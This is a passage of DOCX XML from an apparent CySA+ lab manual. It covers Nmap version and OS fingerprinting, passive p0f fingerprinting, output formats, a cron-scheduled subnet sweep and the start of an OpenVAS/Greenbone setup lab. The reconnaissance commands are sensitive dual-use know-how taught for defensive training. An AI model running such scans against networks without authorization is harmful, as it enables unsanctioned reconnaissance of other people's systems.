        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -sV -Pn -T4 scanme.nmap.org -p 22,80,443</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-sV probes each open port to identify the service banner. The output identifies SSH version, web server, etc. — feeding the CVE matching step later.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — OS fingerprinting (active)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -O -Pn scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-O sends crafted probes and matches TCP/IP stack quirks against its OS database. Note: requires root inside the VM (Killercoda gives root).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Passive fingerprinting (alternative)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Active scans are noisy and can trip IDS rules. Passive fingerprinting sniffs existing traffic instead:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt install -y p0f tcpdump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p0f -i any -o /tmp/p0f.log &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s https://example.com &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sleep 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>kill %1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep -m5 . /tmp/p0f.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>p0f infers the remote OS from TCP options without sending a packet — exam-blueprint passive scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Credentialed vs non-credentialed (concept)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Nmap is non-credentialed. To get a credentialed view you would use:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>nmap --script ssh-auth-methods (limited)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A scanner like OpenVAS or Nessus with SSH/SMB credentials (see Lab 12)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Credentialed scans find missing patches, weak configs, and local CVEs invisible to network probes. Non-credentialed scans see only what an attacker on the wire would see.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Output formats for the inventory pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -sV -Pn scanme.nmap.org -p 80,443 -oA /tmp/scan_inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls /tmp/scan_inventory.*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-oA saves three formats simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.nmap — human-readable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.gnmap — grep-friendly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.xml — machine-readable for SIEM / CMDB ingestion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Parse the XML:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt install -y libxml2-utils</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xmllint --xpath '//host/address/@addr | //port/service/@product' /tmp/scan_inventory.xml | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Schedule a recurring scan (Special considerations)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CySA+ 2.1 lists "Scheduling, Operations, Performance, Sensitivity, Segmentation, Regulatory" as scan considerations. A simple cron entry:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "0 2 * * * root nmap -sn 10.0.0.0/24 -oG /var/log/asset-inventory-\$(date +\\%F).gnmap" &gt; /etc/cron.d/asset_inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat /etc/cron.d/asset_inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scan at 02:00 — outside business hours to respect operations and performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run a ping-sweep map scan and version/OS fingerprint with Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The difference between active (Nmap) and passive (p0f) fingerprinting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Internal vs external scan scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to output Nmap data for pipeline consumption and schedule it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IP Subnet Calculator (https://alfredang.github.io/ipcalculator/) — a browser IP/subnet calculator for network and CIDR planning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the IP Subnet Calculator to work out the exact host range for your Nmap sweep so you scan the whole subnet and nothing outside it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to run a ping-sweep map scan and version/OS fingerprint with Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 12 — Vulnerability Scanning with OpenVAS (Greenbone CE)</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run a full credentialed vulnerability scan with OpenVAS / Greenbone Community Edition, the free alternative to Nessus and Qualys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will run a full credentialed vulnerability scan with OpenVAS / Greenbone Community Edition, the free alternative to Nessus and Qualys. This maps directly to CySA+ 2.2 (Vulnerability scanners — Nessus, OpenVAS) and 2.1 (Agent vs agentless, Credentialed vs non-credentialed, Industry frameworks).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; Heads up: Greenbone CE downloads a multi-GB feed and runs several services. It is too heavy for Killercoda. Run it on your own laptop in VirtualBox or VMware instead.</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Local VM — Greenbone Community Edition (VirtualBox/VMware)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="3147046"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_d982d7766c.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="3147046"/>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4937760" cy="1863762"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_df975392f0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="1863762"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Download the free Greenbone CE virtual appliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Browser: https://www.greenbone.net/en/community-edition/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pick Greenbone Community Edition (GCE) Virtual Appliance. Alternative paths:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Docker compose: https://greenbone.github.io/docs/latest/22.4/container/index.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Kali Linux: sudo apt install gvm + sudo gvm-setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Boot, set admin password, sign in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Import the OVA into VirtualBox, give it 4 GB RAM and a bridged adapter. On first boot:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set the admin password at the console.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Wait for the feed sync to finish (gvm-check-setup shows OK).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open https://&lt;vm-ip&gt;:9392 in your browser — accept the self-signed cert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Add a target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In the Greenbone Security Assistant web UI:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Configuration → Targets → New Target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Name: lab-target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hosts: 192.168.56.0/24 (or a single test IP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Port List: All IANA assigned TCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
